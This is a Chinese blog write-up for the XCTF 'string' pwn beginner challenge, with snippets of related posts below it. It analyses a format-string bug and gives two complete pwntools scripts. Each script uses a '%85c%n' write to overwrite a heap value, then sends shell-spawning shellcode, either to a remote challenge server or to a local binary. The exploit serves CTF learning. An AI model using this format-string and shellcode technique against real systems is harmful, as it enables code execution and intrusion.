攻防世界 string WP

最新推荐文章于 2024-07-16 02:03:11 发布
原创 最新推荐文章于 2024-07-16 02:03:11 发布 · 1.3k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#格式化字符串漏洞 #pwn新手练习区 #攻防世界 string #攻防世界

本文详细解析了一个存在格式化字符串漏洞的程序,通过具体步骤展示了如何利用此漏洞修改内存中的值,最终达到执行shellcode的目的。文章深入分析了漏洞原理,提供了实际的PoC代码,并探讨了不同输入方式对漏洞利用的影响。

检查文件类型(file命令),检查安全措施(checksec命令)就不多说了,只有PIE没有开。
首先查看一下main函数,有一个sub_400996函数,这个函数就是负责打印一些信息。然后通过malloc申请了8个字节大小的内存,返回的指针为v3,将v3的值(指针的值为地址)存入v4,实际上v3v4都指向了刚才申请的那块内存。然后赋值,将前四个字节赋值为68后四个字节赋值为85。后面通过printf打印了v4v4+4的值,其实就是68和85的地址
在这里插入图片描述

下面有个sub_400D72(v4)函数,将v4的值(也就是v3指向的地址)传了进去,进入这个函数,首先接收一个字符串,长度不大于12,然后有三个函数,分别进行分析。

在这里插入图片描述

首先是sub_400A7D函数,通过上面的字符串提示,可以看到,让我们选择east还是up,但是下面有个while循环,如果你输入的不是east,是无法跳出这个循环的,所以这里我们没得选,只能输入east

在这里插入图片描述

我们返回上一级,继续分析第二个函数,sub_400BB9,首先输入一个 1 ,然后输入一个v2%ld表示4字节有符号整数,下面的scanfprintf构成了一个格式化字符串漏洞。

在这里插入图片描述

这个漏洞怎么利用,还得继续往下分析,我们返回上一级,分析第三个函数sub_400CA6

在这里插入图片描述

判断*a1 是否等于a1[1], 其实a1就是v4*a1的值68a1[1]的值为85。下面有一个read函数,将输入存放在v1,然后下面有一个通过函数指针进行强制类型转换,将刚才的输入转换成一个函数,最后执行。函数指针的相关介绍可以看一下菜鸟教程

这样思路就清晰了,通过格式化字符串漏洞将其中一个值改成另一个值,使这个if条件成立,然后传入shellcode就可以了。对于格式化字符串漏洞不了解的可以看一下这篇文章

先找一下格式化字符串漏洞的偏移,可以看到,在提示我们传入地址的时候,输入了一个1234,他的十六进制是0x4d2,偏移为7。

在这里插入图片描述

脚本如下,可以将*a1的值改成85,也可以将a1[1]的值改成68,当然把两个地址的值都改了也是可以的,只要两个值相同就行。还有一点需要注意的是,通过第一个scanf传入地址,里面的格式化字符串是%ld,也就是说解释成有符号的长整型,所以不需要进行打包操作。如果这里格式化字符串是%s,那么我们就需要将地址进行打包操作了。

from pwn import *

context(arch='amd64', os='linux', log_level='debug')
#conn = process('./str')
conn = remote('220.249.52.133',32702)

conn.recvuntil('secret[0] is ')
secret0 = int(conn.recvuntil('\n')[:-1], 16)
log.success('secret[0] => {}'.format(hex(secret0)))

#conn.recvuntil('secret[1] is ')
#secret1 = int(conn.recvuntil('\n')[:-1], 16)
#log.success('secret[1] => {}'.format(hex(secret1)))

conn.sendlineafter("What should your character's name be:", 'casuall')

conn.sendlineafter('So, where you will go?east or up?:', 'east')

conn.sendlineafter('go into there(1), or leave(0)?:', '1')
# 这里也可以穿入secret1,也就是将v3[1]改成68
conn.sendlineafter("'Give me an address'", str(secret0))
# 如果上面secret1的话,下面的85就需要改成68
payload = '%85c%7$n'
conn.sendlineafter('And, you wish is:', payload)
conn.recvuntil('Wizard: I will help you! USE YOU SPELL\n')

payload = asm(shellcraft.sh())
conn.sendline(payload)

conn.interactive()

但是我尝试不通过第一个scanf输入的地址,直接通过第二个scanf去修改任意地址的值,失败了,不知道原因在哪。

payload = p64(secret0) + '%85c%8$n'.encode() #我的pwntools是python3版本的,所以需要加encode

从理论上讲,我将需要修改的地址写进去,然后更改偏移,也能实现同样的效果,但是没有成功。

后续来了,解决了之前的问题,可能是由于不可见字符都会被省略,会导致后续的操作出问题,将地址写在后面就可以了。

payload = '%85c%9$n'.encode() + p64(secret0)

这样即使没有第一个scanf,我们也能过实现将变量覆盖。

from pwn import *

context(arch='amd64', os='linux', log_level='debug')
conn = process('./str')
#conn = remote('220.249.52.133',32702)

conn.recvuntil('secret[0] is ')
secret0 = int(conn.recvuntil('\n')[:-1], 16)
log.success('secret[0] => {}'.format(hex(secret0)))

conn.sendlineafter("What should your character's name be:", 'casuall')

conn.sendlineafter('So, where you will go?east or up?:', 'east')

conn.sendlineafter('go into there(1), or leave(0)?:', '1')

# 和第一个脚本对比,这里不需要传入地址
conn.sendlineafter("'Give me an address'", '1')
# 将地址写在后面,为了避免一些不可见字符对后续造成的影响
payload = '%85c%9$n'.encode() + p64(secret0)
conn.sendlineafter('And, you wish is:', payload)
conn.recvuntil('Wizard: I will help you! USE YOU SPELL\n')

payload = asm(shellcraft.sh())
conn.sendline(payload)

conn.interactive()
攻防世界 pwn string
N1rvana的博客
11-15 4514
攻防世界string应该是新手数一数二的难题,难点在理解程序流程。 先观察主函数: alarm函数 什么是alarm函数? 如上图所示,在做一些pwn题的时候,我们有时会遇到alarm(0x3Cu)函数。alarm函数中的参数0x3Cu是十六进制无符号数,即十进制对应60,所以该函数的作用是在程序运行60秒后,给进程发送SIGALRM信号,如果不另编写程序接受处理此信号,则默认结束此程序。 为什么要使用alarm函数? 一是比赛中常要远程连接服务器解题,官方不希望有队伍长时间解不出来题浪费服务器资源 二
攻防世界 新手string
winterze的博客
04-04 441
0x00 函数分析 基本信息 [*] '/home/ububtu/ctf/string' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) 64位,开启了Canary和...
攻防世界pwn-string
a_silly_coder的博客
05-18 481
首先检查保护 将文件拖入64位ida 查看代码逻辑,发现这个代码有些复杂,但是大多数都是无效信息,很多输入都是指引程序进行的,扰乱我们的视线。 关键信息有:v3v4的数值地址都给出来了,然后查看sub_400D72函数 这里首先输入一个name,这是干扰输入,只要不超过0xC的长度即可。然后sub_400A7D也是干扰输入,只需要跟着代码输入就可以了。接着查看sub_400BB9与sub_400CA6 sub_400BB9这里很显然是有一个格式化字符串漏洞。 接着看s...
攻防世界string
qq_25044201的博客
12-30 253
这道题是我在新手见到的最难的一道题,涉及了格式化字符串,shellcode注入,最难的还是这个过程。繁杂,琐屑。 这句是最关键的,创建个内存然后作为指针函数。这里注入shellcode就可以。但是有个前提a[0]=a[1]我们要通过格式化字符串修改a[0]=85使得a[0]=a[1] ...
攻防世界 string
BengDouLove的博客
03-22 1279
这回终于做上了一道像一个小系统一样的题,有很多输入输出,程序逻辑也复杂了一点,比赛中我看都是这样的题,一直以来遇到这样的题都是不知所措,从这一道开始练手把 这是一个文字版RPG game… 一开始看main函数看不出来什么,注意到输出了secret 输出secret之后进入另一个函数,将v4的值传了进去 然后让输入名字,这里好像没有溢出,名字长度小于12 输入名字之后进入三个函数的第一个,开始...
攻防世界-wp-MOBILE-新手-1-RememberOther
Scorpio_m7
05-08 922
题目附件: 476d9022bb0449c09c0b1e24f0686b66.zip 题目思路: jeb打开查看源码,找到字符串列表,解密md5,结合word提示 解题过程: 用jeb打开,找到源代码.com.droider.crackme0201.MainActivity public boolean checkSN(String userName, String sn) {//前面31行调用此函数 try { if (userName.length() == 0 &&am
攻防世界】crypto解题wp
yezhenfule的博客
11-24 1690
密码学写题记录
攻防世界-wp-PWN-新手-10-string
Scorpio_m7
04-12 430
题目来源: NUAACTF 题目描述: 菜鸡遇到了Dragon,有一位巫师可以帮助他逃离危险,但似乎需要一些要求 题目场景: 111.200.241.244:57862 题目附件: 1d3c852354df4609bf8e56fe8e9df316 题目思路: POP攻击链:通过格式化字符串漏洞修改v4[0]的值,使之与v4[1]相等。然后读入shellcode并运行。 解题过程: 拿到程序后,我们首先checksec一下,发现是64位,保护开启了CANNARY和NX,未开启 PIE,载入IDA64,找到ma
攻防世界-web新手wp
博客
08-15 3047
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 攻防世界—web新手wp1.view source2.robots3.backup4.cookie5.disabled_button6.weak auth7.simple php8.get_post9.xff_referer10.Webshell(文件上传)11.command_execution(命令执行)12.simple_js(代码审计)@总结 1.view source 提示:X老师让小宁同学查看一个网页的源代码,但小宁同学发现
攻防世界crypto新手wp
博客
08-22 2771
文章目录base64(base密码)caesar(凯撒密码)morse(摩尔斯密码)幂数加密(云影密码)不仅仅是Morse(莫斯密码+培根密码)混合编码(base64-unicode(html)-base64-ascll)easy_RSA(RSA算法 rsa-tool工具解)Easychallenge(pyc反编译解码)Broadcast转轮机加密Normal_RSAeasy_ecc base64(base密码) 先了解一下base64吧: 用base64这种方式编码后得到的是一个字符串,其中的字符可以包
[PWN](攻防世界)string
ljh15937的博客
09-21 1362
分析程序漏洞 了解程序的基本信息 64位小端序 开启了 Canary 保护,栈不可执行,未开启 PIE, 使用 IDA Pro 进行静态分析,由于该程序的执行流较为复杂,需要花些时间理清程序的具体执行流程 使用 GDB 进行动态调试,设置断点执行到 printf(&format, &format);,可以发现输入的地址 0xa98ac7 在栈顶的第二个8字节,根据64位程序的传参方式,该地址是格式化字符串的第 7 个参数,printf() 函数的第 8 个参数。
攻防世界STRing
WangLal的博客
07-06 419
攻防世界PWN StringWP 基本的三步checksec,file,执行文件 这是一个64位文件,只有pIE没开。 由string这个题目猜测可能会是字符串漏洞 将下载好的附件扔进IDA里查看,点击main函数 main函数中找不到,那就在其他函数看一下。 点击 sub_400D72 要进入if条件中,输入的s的长度需小于12位 在sub_400BB9函数中看到了 printf前几句中存在%s与%ld,可以操作. 继续看下一个函数 (a1+4是指a1加4个字节,也就是一个整数类型所以这个就是a
[攻防世界]string
逆向萌新的博客
06-20 327
[攻防世界]string详解
攻防世界-pwn-String
weixin_44558065的博客
10-19 409
本人为萌新,以下只是个人看法。
攻防世界新手string
hanabi_sh
10-15 745
攻防世界string格式化字符漏洞
攻防世界PWN [GFSJ0469] string (不太正经的wp
最新发布
qq_52161487的博客
07-16 1167
拐角的光线很暗,暗得我看不清她的脸和表情,还有烦人的蚊子一直叮我的腿,但从来没有任何一个夏天的感觉能够如此真实。为了回家,勉为其难地,我答应了她。那个她曾和我说过,你们这些人整天对着电脑看书,一个劲儿地用一个女生头像的软件,这一横条一横条的是什么东西,一会goto一会mov的,就像是在走迷宫。前两天在我MP3上听的那首周董的歌你还记得嘛,远方传来风笛,我只在意有你的消息......”好吧,都已经走到现在了,回去未免沦为笑柄,也辜负了巫师小姐姐对我们的期望,我们要做的只能是硬着头皮走下去,来吧,
stringwp
wuyvle的博客
01-23 425
string 64位的程序,主函数里面有3个函数,都有canary保护 v4 = malloc(8uLL); v5 = (__int64)v4; *v4 = 68; v4[1] = 85; puts("we are wizard, we will give you hand, you can not defeat dragon by yourself ..."); puts("we will tell you two secret ..."); printf("secret[0] is %x\n", v5,
攻防世界-string-Writeup
SkYe's Blog
05-15 587
string [collapse title=“展开查看详情” status=“false”] 考点:格式化字符串任意地址写小数 题目前面有几个条件循环绕过,反编译就能看出,不再赘述。看漏洞函数: unsigned __int64 sub_400BB9() { int v1; // [rsp+4h] [rbp-7Ch] __int64 v2; // [rsp+8h] [rbp-78h] char format; // [rsp+10h] [rbp-70h] unsigned __int64
攻防世界CTF杂项挑战详解
资源摘要信息:"攻防世界是一个以网络安全攻防竞技为主的在线平台,而CTF(Capture The Flag,夺旗赛)是一种流行的信息安全竞赛。在这个平台上,参赛者会遇到各种类型的问题,其中包括杂项(misc)类别。杂项题目...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值